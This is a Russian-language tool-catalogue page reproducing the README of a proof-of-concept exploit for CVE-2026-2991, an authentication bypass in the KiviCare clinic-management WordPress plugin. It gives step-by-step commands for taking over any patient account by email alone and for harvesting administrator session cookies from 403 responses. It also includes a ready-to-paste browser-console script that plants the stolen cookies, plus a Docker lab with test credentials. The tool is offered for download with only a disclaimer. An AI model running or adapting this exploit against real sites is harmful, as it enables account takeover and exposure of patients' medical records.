Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/joshuavanderpoll/cve-2026-2991
Аутентификация и авторизацияАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на Проникновение
GitHubjoshuavanderpoll/cve-2026-2991

CVE-2026-2991

PoC-эксплойт для CVE-2026-2991 — обход аутентификации в плагине KiviCare для WordPress (≤4.1.2), позволяющий захват учётных записей пациентов без аутентификации и извлечение административных сессий.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
РепозиторийСайт
265 месяцев назадЕщё не проверено

KiviCare <= 4.1.2 - Обход аутентификации (CVE-2026-2991) PoC

Python

📜 Описание

CVE-2026-2991 — это уязвимость обхода аутентификации в WordPress-плагине KiviCare – Clinic & Patient Management System (EHR), затрагивающая все версии вплоть до 4.1.2 включительно.

Плагин предоставляет публичную REST-конечную точку /wp-json/kivicare/v1/auth/patient/social-login, которая аутентифицирует пользователей через социальный вход. Функция patientSocialLogin() принимает адрес электронной почты и токен доступа, но никогда не проверяет токен у указанного социального провайдера. Любой неаутентифицированный злоумышленник может войти как любой зарегистрированный пациент, указав только его email и произвольную строку в качестве токена.

Кроме того, файлы cookie аутентификации WordPress выдаются до проверки роли пациента. Это означает, что для учётных записей, не являющихся пациентами (включая администраторов), ответ возвращает HTTP 403, но при этом содержит допустимые заголовки Set-Cookie — что позволяет злоумышленнику получить воспроизводимую сессию администратора.

Затронутые версии: kivicare-clinic-management-system <= 4.1.2

✨ Возможности

  • Без аутентификации — не требуются учётные данные или предыдущая сессия
  • Захват учётной записи пациента — вход как любой зарегистрированный пациент, используя только его email
  • Утечка сессии администратора — извлекает валидные auth-куки администратора из ответа 403 для учётных записей, не являющихся пациентами
  • Фрагмент для консоли браузера — выводит готовый к вставке JavaScript для внедрения куки и перехода прямо в панель управления

OSX/Linux

root@kitploit:~
git clone https://github.com/joshuavanderpoll/CVE-2026-2991.git
cd CVE-2026-2991
python3 -m venv .venv
source .venv/bin/activate
pip3 install -r requirements.txt

Windows

root@kitploit:~
git clone https://github.com/joshuavanderpoll/CVE-2026-2991.git
cd CVE-2026-2991
python3 -m venv .venv
.venv\Scripts\activate
pip3 install -r requirements.txt

⚙️ Использование

root@kitploit:~
python3 CVE-2026-2991.py --url <TARGET_URL> --email <TARGET_EMAIL> [--login-type <google|apple>] [--timeout <SECONDS>] [--useragent <UA>]

Захват учётной записи пациента

Обходит аутентификацию зарегистрированного пациента. Скрипт возвращает его полную сессию, включая nonce и воспроизводимые cookie.

root@kitploit:~
python3 CVE-2026-2991.py --url 'https://target.com' --email '[email protected]'

Обход аутентификации пациента


Утечка сессии администратора (учётная запись не пациента)

Укажите email любого пользователя, не являющегося пациентом (например, администратора). Конечная точка выдаёт валидные auth-cookie до проверки роли и возвращает 403 — эти cookie извлекаются и выводятся.

root@kitploit:~
python3 CVE-2026-2991.py  --url http://localhost:8080/ --email '[email protected]'

Утечка cookie администратора


Вход через консоль браузера

После успешного запуска скрипт выводит JavaScript-фрагмент. Откройте целевой сайт в браузере, вставьте фрагмент в консоль браузера (F12 → Console) и нажмите Enter — он установит украденные cookie и автоматически перенаправит вас в панель управления.

root@kitploit:~
(() => {
  document.cookie = "wordpress_<hash>=<value>; path=/";
  document.cookie = "wordpress_logged_in_<hash>=<value>; path=/";
  window.location.href = "http://target.com/kivicare-patient-dashboard";
})();

🐋 Docker PoC

Автономная среда Docker Compose с предустановленным уязвимым плагином и реалистичными тестовыми данными. Подробнее см. в DOCKER.md.

root@kitploit:~
cd docker/
docker compose up

Лаборатория создаёт следующие учётные записи при первом запуске:

root@kitploit:~
# Bypass a patient
python3 CVE-2026-2991.py --url 'http://localhost:8080' --email '[email protected]'

# Leak admin session cookies
python3 CVE-2026-2991.py --url 'http://localhost:8080' --email '[email protected]'

🕵🏼 Ссылки

  • KiviCare — WordPress Plugin
  • NVD — CVE-2026-2991
  • WordFence
  • HackIndex.io — CVE-2026-2991

📢 Отказ от ответственности

Этот инструмент предоставляется исключительно в образовательных и исследовательских целях. Создатель не несёт ответственности за любое неправомерное использование или ущерб, причинённый данным инструментом.

Скачать инструмент
RoleUsernameEmailPassword
Adminadmin[email protected]admin
Doctordr.harris[email protected]Doctor@123
Doctordr.chen[email protected]Doctor@123
Doctordr.okonkwo[email protected]Doctor@123
Patientjames.ford[email protected]Patient@123
Patientsofia.reyes[email protected]Patient@123
Patientoliver.knight[email protected]Patient@123
Patientamara.diallo[email protected]Patient@123
Patientdan.walsh[email protected]Patient@123